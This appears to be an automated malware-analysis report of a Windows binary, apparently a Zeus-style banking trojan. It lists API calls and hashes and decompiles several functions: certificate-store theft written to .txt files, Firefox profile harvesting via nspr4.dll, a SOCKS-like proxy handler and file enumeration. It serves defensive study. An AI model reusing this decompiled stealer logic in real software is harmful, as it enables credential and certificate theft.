    0x0041d23e
    0x0041d245
    0x0041d24c
    0x0041d25a
    0x0041d25d
    0x0041d260
    0x0041d282
    0x0041d28f
    0x0041d2a4
    0x00000000
    0x0041d2a6
    0x0041d2a9
    0x0041d2af
    0x00000000
    0x0041d2af
    0x0041d284
    0x0041d284
    0x0041d284
    0x0041d284
    0x0041d2b6
    0x0041d2b6
    0x0041d2b6
    0x0041d2b6
    0x0041d2bb

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 0041D206
    • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 0041D260
    • WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00404B7C,00000000,?,?,?,74B5F6F0), ref: 0041D29C
    • TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 0041D2A9
      • Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DC6
      • Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DCF
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
    • String ID:
    • API String ID: 401097067-0
    • Opcode ID: ea62d19cbb0a0431406a02fedd977ef4f6b89a9ba84c8f04f5972e1b590d8b0f
    • Instruction ID: 4a4c91e14d89cf9cf2b8269b0528476d436870fffab8804c9f057a34f51dc59c
    • Opcode Fuzzy Hash: ea62d19cbb0a0431406a02fedd977ef4f6b89a9ba84c8f04f5972e1b590d8b0f
    • Instruction Fuzzy Hash: 3111A571900208ABEB50ABA1DC49FEE777CEF84704F0441BBF904FA055D778D585CA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FA7D(void* __eflags) {
    				void* _t1;
    				void* _t2;
    				void* _t3;
    				long _t6;
    				void* _t11;
    
    				_t1 = E0040EDBB(_t11, __eflags, 0x19367401, 1);
    				_t19 = _t1;
    				if(_t1 != 0) {
    					_t2 = E0040EEE1();
    					__eflags = _t2;
    					if(_t2 != 0) {
    						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    						_t6 = WaitForSingleObject( *0x42305c, 0x1388);
    						while(1) {
    							__eflags = _t6 - 0x102;
    							if(_t6 != 0x102) {
    								goto L6;
    							}
    							E00415AB4();
    							_t6 = WaitForSingleObject( *0x42305c, 0x1388);
    						}
    					}
    					L6:
    					E00419B7B(_t19);
    					_t3 = 0;
    					__eflags = 0;
    				} else {
    					_t3 = _t1 + 1;
    				}
    				return _t3;
    			}

    0x0040fa8e
    0x0040fa93
    0x0040fa97
    0x0040fa9c
    0x0040faa1
    0x0040faa3
    0x0040faae
    0x0040fac6
    0x0040fadd
    0x0040fadd
    0x0040fadf
    0x00000000
    0x00000000
    0x0040facf
    0x0040fadb
    0x0040fadb
    0x0040fadd
    0x0040fae1
    0x0040fae2
    0x0040fae7
    0x0040fae7
    0x0040fa99
    0x0040fa99
    0x0040fa99
    0x0040faf0

    APIs
      • Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC
    • GetCurrentThread.KERNEL32 ref: 0040FAA7
    • SetThreadPriority.KERNEL32(00000000), ref: 0040FAAE
    • WaitForSingleObject.KERNEL32(00001388), ref: 0040FAC6
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
    • String ID:
    • API String ID: 3441234504-0
    • Opcode ID: d6194b26e9e83bb08f35f87aeae499a7cdcf98306a51956291d66627feef7e96
    • Instruction ID: 5e41fbfb5b90545927457ec579b36da94973f3bc3e8f05cae4b2341ffd15a578
    • Opcode Fuzzy Hash: d6194b26e9e83bb08f35f87aeae499a7cdcf98306a51956291d66627feef7e96
    • Instruction Fuzzy Hash: 0CF02B313042186ACB2177A66C45897374DDB45365B240377FD15F26F1E97A4C4149FD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419B15(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t16;
    
    				while(1) {
    					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    					if(_t16 != 1) {
    						break;
    					}
    					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    						if(_v28.message != 0x12) {
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t16;
    			}

    0x00419b5c
    0x00419b68
    0x00419b6d
    0x00000000
    0x00000000
    0x00419b48
    0x00419b30
    0x00419b37
    0x00419b42
    0x00000000
    0x00419b42
    0x00000000
    0x00419b30
    0x00419b48
    0x00419b70
    0x00419b78

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MessageMultipleObjectsPeekWait
    • String ID:
    • API String ID: 3986374578-0
    • Opcode ID: 48622f7d25ea60df21fb18c351a08da3bbbc9717bb0aeff12fa16d3d1242fedf
    • Instruction ID: dc615b350561e98b7e1621ce7ac628e4798ed18076dc88d8d14c15904d5946ec
    • Opcode Fuzzy Hash: 48622f7d25ea60df21fb18c351a08da3bbbc9717bb0aeff12fa16d3d1242fedf
    • Instruction Fuzzy Hash: 32F0FC325083196BD710AA99EC48DA7BB9CFB45394F44053AFA01D3171D176BC4487B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004069DC(void* __eflags, signed int _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				signed int _v24;
    				signed int _v29;
    				short _v31;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				short _v50;
    				char _v52;
    				char _v312;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t59;
    				void* _t61;
    				short _t77;
    				void* _t79;
    				void* _t84;
    				char _t103;
    				char* _t105;
    				signed int _t115;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t127;
    				char _t129;
    				void* _t131;
    				intOrPtr _t132;
    				void* _t133;
    
    				_t110 = _a4;
    				_t59 = E00419960(_t110);
    				_push(0);
    				_push( &_v32);
    				_t61 = 7;
    				_v24 = 0 | _t59 == 0x00000017;
    				if(E0041935B(_t61, _t110) != 0) {
    					while(E0041935B(1, _t110,  &_v9, 0) != 0) {
    						if(_v9 == 0) {
    							_t115 = _v29;
    							_t116 = _t115 << 0x10;
    							_v13 = 0x5a;
    							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L20:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L44:
    									return E00406966(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
    								}
    								E0041645B( &_v52,  &_v52, 0, 0x10);
    								_t77 = 2;
    								_v52 = _t77;
    								_t79 = (_v32 & 0x000000ff) - 1;
    								if(_t79 == 0) {
    									_v50 = _v31;
    									_v48 = _v29;
    									_t127 = E004193F0( &_v52);
    									if(_t127 == 0xffffffff) {
    										L23:
    										_v13 = 0x5b;
    										goto L44;
    									}
    									E004197A3(_t116, _t127);
    									_t84 = E00406966(_t110, _t127, 0x5a, _v24);
    									if(_t84 != 1) {
    										if(_t84 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										_push(_t127);
    										_t84 = E004195A4(_t110);
    									}
    									E0041974B(_t84, _t127);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L34:
    										return _v9;
    									} else {
    										goto L44;
    									}
    								}
    								if(_t79 == 1) {
    									_t129 = E004194EA( &_v52, 1);
    									_v20 = _t129;
    									if(_t129 == 0xffffffff) {
    										goto L23;
    									}
    									_t125 = E00406966(_t110, _t129, 0x5a, _v24);
    									if(_t125 != 1) {
    										L31:
    										E0041974B(_t89, _t129);
    										if(_t125 == 0xffffffff) {
    											goto L23;
    										}
    										if(_t125 != 1) {
    											_v9 = 0;
    										}
    										goto L34;
    									}
    									_t126 = E0041971B( &_v20,  &_a4);
    									_v36 = _t126;
    									E0041974B(_t93, _v20);
    									if(_t126 != 0xffffffff) {
    										E004197A3(_t116, _t126);
    										_t110 = _a4;
    										_t125 = E00406966(_a4, _t126, 0x5a, _v24 | 0x00000002);
    										if(_t125 == 1) {
    											_push(_v36);
    											_t89 = E004195A4(_t110);
    										}
    										_t129 = _v36;
    										goto L31;
    									}
    									_t110 = _a4;
    									_v13 = 0x5b;
    									goto L44;
    								}
    								goto L23;
    							}
    							_t131 = 0;
    							while(1) {
    								_t116 = _t110;
    								if(E0041935B(1, _t110,  &_v9, 0) == 0) {
    									goto L1;
    								}
    								_t103 = _v9;
    								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
    								if(_t103 == 0) {
    									_t105 =  &_v312;
    									_v20 = 0;
    									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
    									if(_t105 == 0) {
    										_t132 = _v20;
    										while(_t132 != 0) {
    											if( *((intOrPtr*)(_t132 + 4)) == 2) {
    												E004163E4( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t132 == 0) {
    													goto L12;
    												}
    												goto L20;
    											}
    											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
    										}
    										goto L19;
    									}
    									L12:
    									_v13 = 0x5b;
    									goto L20;
    								}
    								_t131 = _t131 + 1;
    								if(_t131 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}

    0x004069e6
    0x004069ec
    0x004069fc
    0x00406a00
    0x00406a03
    0x00406a04
    0x00406a10
    0x00406a1f
    0x00406a1d
    0x00406a34
    0x00406a4d
    0x00406a5b
    0x00406a64
    0x00406aee
    0x00406af2
    0x00406af6
    0x00406c24
    0x00000000
    0x00406c34
    0x00406b03
    0x00406b0a
    0x00406b0b
    0x00406b13
    0x00406b14
    0x00406bc8
    0x00406bd2
    0x00406bda
    0x00406bdf
    0x00406b1d
    0x00406b1d
    0x00000000
    0x00406b1d
    0x00406be6
    0x00406bf2
    0x00406bfa
    0x00406c07
    0x00406c0f
    0x00406c09
    0x00406c09
    0x00406c09
    0x00406bfc
    0x00406bfc
    0x00406bfd
    0x00406bfd
    0x00406c13
    0x00406c1c
    0x00406bba
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406c1c
    0x00406b1b
    0x00406b30
    0x00406b32
    0x00406b38
    0x00000000
    0x00000000
    0x00406b46
    0x00406b4b
    0x00406ba3
    0x00406ba3
    0x00406bab
    0x00000000
    0x00000000
    0x00406bb4
    0x00406bb6
    0x00406bb6
    0x00000000
    0x00406bb4
    0x00406b5d
    0x00406b5f
    0x00406b62
    0x00406b6a
    0x00406b79
    0x00406b81
    0x00406b91
    0x00406b96
    0x00406b98
    0x00406b9b
    0x00406b9b
    0x00406ba0
    0x00000000
    0x00406ba0
    0x00406b6c
    0x00406b6f
    0x00000000
    0x00406b6f
    0x00000000
    0x00406b1b
    0x00406a6a
    0x00406a6c
    0x00406a74
    0x00406a7d
    0x00000000
    0x00000000
    0x00406a7f
    0x00406a82
    0x00406a8b
    0x00406aa1
    0x00406aa8
    0x00406aab
    0x00406ab3
    0x00406abb
    0x00406ac9
    0x00406ac4
    0x00406adc
    0x00406ae1
    0x00406ae4
    0x00406aec
    0x00000000
    0x00000000
    0x00000000
    0x00406aec
    0x00406ac6
    0x00406ac6
    0x00000000
    0x00406acd
    0x00406ab5
    0x00406ab5
    0x00000000
    0x00406ab5
    0x00406a8d
    0x00406a94
    0x00000000
    0x00000000
    0x00000000
    0x00406a96
    0x00000000
    0x00406a6c
    0x00406a1d
    0x00406a1f
    0x00406a12
    0x00000000

    APIs
      • Part of subcall function 00419960: getsockname.WS2_32(?,?,?), ref: 0041997E
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00406AAB
    • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406AE4
      • Part of subcall function 004197A3: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004197B9
      • Part of subcall function 00406966: getpeername.WS2_32(000000FF,?,?), ref: 0040698A
      • Part of subcall function 004195A4: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00419644
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
    • String ID: Z
    • API String ID: 1849152701-1505515367
    • Opcode ID: 13409f4bd4ff2b436bbba123a69fc7bb46ce568d98e34d7e3fb09613ec1f9c84
    • Instruction ID: 4b257c487b56122188975d2a837a49f7360739d30df9cc7a04033035c71775bc
    • Opcode Fuzzy Hash: 13409f4bd4ff2b436bbba123a69fc7bb46ce568d98e34d7e3fb09613ec1f9c84
    • Instruction Fuzzy Hash: 96612971A001186ADF20AAA4CC41AEFB7B99F46314F06417BF952F72C1C27C9951CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0041D7B6(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				void* _t65;
    				intOrPtr* _t66;
    				void* _t67;
    				void* _t71;
    				char* _t74;
    				signed int _t76;
    				void* _t78;
    				void* _t79;
    
    				_t61 = __ecx;
    				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
    				_t59 = _a4;
    				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
    				_v776 = __eax;
    				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0040EEE1() != 0) {
    					GetSystemTime( &_v760);
    					E0040FA33(0xaa,  &_v600);
    					_t74 =  &_v744;
    					E0040FA33(0xab, _t74);
    					E0041D595( &_v536, _t61);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t74);
    					_push( &_v536);
    					_push( &_v600);
    					_t65 = 0x3e;
    					_t47 = E0041709B( &_v600, _t65,  &_v728);
    					_t79 = _t78 + 0x18;
    					if(_t47 > 0 && E00405780(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
    						_t66 = _a8;
    						if(_t66 != 0 &&  *_t66 != 0) {
    							 *((short*)(E004163E4(_t79 + 0x48 + E00416EF7( &_v728) * 2, L".txt", 8) + 8)) = 0;
    							_t64 = _t66;
    							if(E004171FF(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
    								E00405780(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
    								E004171ED( &_v784);
    							}
    						}
    					}
    				}
    				return _v776;
    			}

    0x0041d7b6
    0x0041d7bc
    0x0041d7c3
    0x0041d7cf
    0x0041d7d5
    0x0041d7db
    0x0041d81b
    0x0041d82d
    0x0041d832
    0x0041d83b
    0x0041d847
    0x0041d851
    0x0041d857
    0x0041d85d
    0x0041d860
    0x0041d868
    0x0041d870
    0x0041d873
    0x0041d878
    0x0041d87d
    0x0041d882
    0x0041d89a
    0x0041d89f
    0x0041d8c2
    0x0041d8cd
    0x0041d8d6
    0x0041d8e8
    0x0041d8ed
    0x0041d8ed
    0x0041d8d6
    0x0041d89f
    0x0041d882
    0x0041d8fc

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 0041D7CF
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GetSystemTime.KERNEL32(?), ref: 0041D81B
      • Part of subcall function 0041D595: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D6EC,?,?,00000000), ref: 0041D5AA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: 11ba04b996bde7f2d635745290795b6e1f62cac37877c571f40ebcf401ad2342
    • Instruction ID: 5568e0f4f6a53af6ca8cd525595dc951203973f07148f55f77621705704d7155
    • Opcode Fuzzy Hash: 11ba04b996bde7f2d635745290795b6e1f62cac37877c571f40ebcf401ad2342
    • Instruction Fuzzy Hash: 4031F271604350ABCB20EF55CC85BEBB7A8EF88304F04492FBA94D7291D738D985C766
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(0040321C,00000000,00004401,0040322C,?), ref: 00409C9E
    • CoCreateInstance.OLE32(004031EC,00000000,00004401,004031FC,?), ref: 00409CF1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID: D
    • API String ID: 542301482-2746444292
    • Opcode ID: b88a0654aedd0336900518790cbf40bc6efd15565401763a969c4e914b4eb289
    • Instruction ID: 89b15946e97b8f10c8de4a400459779f3e6863da8477c7bdb9e5d9500fc25018
    • Opcode Fuzzy Hash: b88a0654aedd0336900518790cbf40bc6efd15565401763a969c4e914b4eb289
    • Instruction Fuzzy Hash: 0E315AB2644206AFE710DF64CC85D6BB7ECAF84744F00052EF954A7281D735DD058BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412A50(struct HINSTANCE__* __eax) {
    				char _v8;
    				char _v20;
    				char _v108;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t11;
    				void* _t18;
    				signed int _t25;
    				short* _t33;
    				void* _t43;
    
    				_t11 = __eax;
    				_t33 = __eax;
    				if( *0x422e04 > 1) {
    					_t11 = GetModuleHandleW(L"nspr4.dll");
    					if(_t11 != 0) {
    						if(_t33 == 0 ||  *_t33 == 0) {
    							return E004127E2(__eflags, 0);
    						}
    						_t11 = E00416390(2 + E00416EF7(_t33) * 4);
    						_t31 = _t11;
    						if(_t11 != 0) {
    							_t25 = E004171FF(E004172B4(_t33, _t31) | 0xffffffff, _t31,  &_v20);
    							_t11 = E004163A8(_t31);
    							if(_t25 != 0) {
    								_t18 = 0x31;
    								E0040F9FD(_t18,  &_v108);
    								_t43 = E0041716C( &_v8,  &_v108, _v20);
    								_t11 = E004171ED( &_v20);
    								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
    								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
    									E004127E2(_t44, _v8);
    									return E004163A8(_v8);
    								}
    							}
    						}
    					}
    				}
    				return _t11;
    			}

    0x00412a50
    0x00412a60
    0x00412a62
    0x00412a6d
    0x00412a75
    0x00412a7d
    0x00000000
    0x00412aff
    0x00412a93
    0x00412a98
    0x00412a9c
    0x00412ab5
    0x00412ab7
    0x00412abe
    0x00412ac5
    0x00412ac6
    0x00412add
    0x00412ae2
    0x00412ae7
    0x00412ae9
    0x00412aee
    0x00000000
    0x00412af6
    0x00412ae9
    0x00412abe
    0x00412a9c
    0x00412a75
    0x00412b08

    APIs
    • GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 00412A6D
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
      • Part of subcall function 004127E2: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00412809
      • Part of subcall function 004127E2: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041285D
      • Part of subcall function 004127E2: GetPrivateProfileIntW.KERNEL32 ref: 004128C0
      • Part of subcall function 004127E2: GetPrivateProfileStringW.KERNEL32 ref: 004128EC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
    • String ID: 2@$nspr4.dll
    • API String ID: 119068519-3660981267
    • Opcode ID: 99886caa11147f9f509a94a2d539f6056ef45ef908970d9b3ef4647f6800afbd
    • Instruction ID: 0461180c58f455538e386750617150441c3da06e60b3ccf36e6edba77e3af2b5
    • Opcode Fuzzy Hash: 99886caa11147f9f509a94a2d539f6056ef45ef908970d9b3ef4647f6800afbd
    • Instruction Fuzzy Hash: 6F11E331A0420466CF22BB668E42ADEB3B99F80358F14012BF810E32A1DBFC9DD5D19D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041AA01(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
    				signed int _v14;
    				signed int _v16;
    				signed int _v20;
    				char _v284;
    				unsigned int _t24;
    				void* _t26;
    				signed int _t28;
    				signed int* _t29;
    				void* _t30;
    				void* _t41;
    				char* _t42;
    				void* _t45;
    				signed int _t46;
    				void* _t47;
    
    				_t45 = __ecx;
    				_t24 = E004163E4( &_v20, _a4, 0x10);
    				_v20 = _v20 ^ _t24;
    				_v16 = _v16 ^ _t24;
    				_v14 = _v14 ^ _t24 >> 0x00000010;
    				_t41 = 0;
    				_t26 = 0;
    				do {
    					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t41 = _t41 + 1;
    				} while (_t41 < 8);
    				if(_a12 != 0) {
    					E004163E4( &_v284, _a12, 0x102);
    					E00417824( &_v284, _t41,  &_v20, 0x10);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 != 0) {
    					_t30 = _t28 - 1;
    					if(_t30 == 0) {
    						_t42 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t30 == 1) {
    							_t42 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t46);
    							E00416749(_t46, _t42, _t45);
    							_t45 = _t45 + _t46 * 2;
    						}
    					}
    				}
    				_t29 =  &_v20;
    				__imp__StringFromGUID2(_t29, _t45, 0x28);
    				return _t29;
    			}

    0x0041aa11
    0x0041aa17
    0x0041aa1c
    0x0041aa1f
    0x0041aa26
    0x0041aa2a
    0x0041aa2c
    0x0041aa2e
    0x0041aa32
    0x0041aa36
    0x0041aa3a
    0x0041aa3c
    0x0041aa3c
    0x0041aa3e
    0x0041aa3f
    0x0041aa48
    0x0041aa59
    0x0041aa6a
    0x0041aa6a
    0x0041aa73
    0x0041aa76
    0x0041aa78
    0x0041aa79
    0x0041aa87
    0x0041aa8c
    0x00000000
    0x0041aa7b
    0x0041aa7c
    0x0041aa7e
    0x0041aa83
    0x0041aa8e
    0x0041aa8e
    0x0041aa93
    0x0041aa98
    0x0041aa98
    0x0041aa7c
    0x0041aa79
    0x0041aa9e
    0x0041aaa2
    0x0041aaab

    APIs
    • StringFromGUID2.OLE32(00000000,?,00000028,0040EDB5,?,00000010,00000000,77E49EB0), ref: 0041AAA2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: ca350e689460684c24b7c8eef37b408a11398eff3cc5e430a884a92163156dbe
    • Instruction ID: 4e4e9d450865f3a22218405f983f3e5e7dc850e700f61cc5540e5d7f9513722e
    • Opcode Fuzzy Hash: ca350e689460684c24b7c8eef37b408a11398eff3cc5e430a884a92163156dbe
    • Instruction Fuzzy Hash: DA11383165010D67CB24DBB48D06BEF3768EF44704F40482BE602E20C1DAB8C5D5C799
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040B9CD(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v572;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v52;
    				E0040FA33(0x81, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E0041645B( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v572;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E0041BAD3( &_v572,  &_v16, _t37, 1, 2, E0040B732,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E004163A8(_v12);
    				}
    				return E004099E1(_t29, _v12, 0xcb);
    			}

    0x0040b9d8
    0x0040b9e0
    0x0040b9e9
    0x0040b9f3
    0x0040b9fa
    0x0040ba01
    0x0040ba08
    0x0040ba0d
    0x0040ba0f
    0x0040ba0f
    0x0040ba1d
    0x0040ba23
    0x0040ba25
    0x0040ba37
    0x0040ba40
    0x0040ba40
    0x0040ba45
    0x0040ba46
    0x0040ba4e
    0x00000000
    0x0040ba67
    0x00000000

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040BA1D
      • Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
      • Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
      • Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
      • Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
      • Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
      • Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: e9cf2db2014f4d433e1b7766319a2c2461d1af58fd5dc9081ef01596ad424dd1
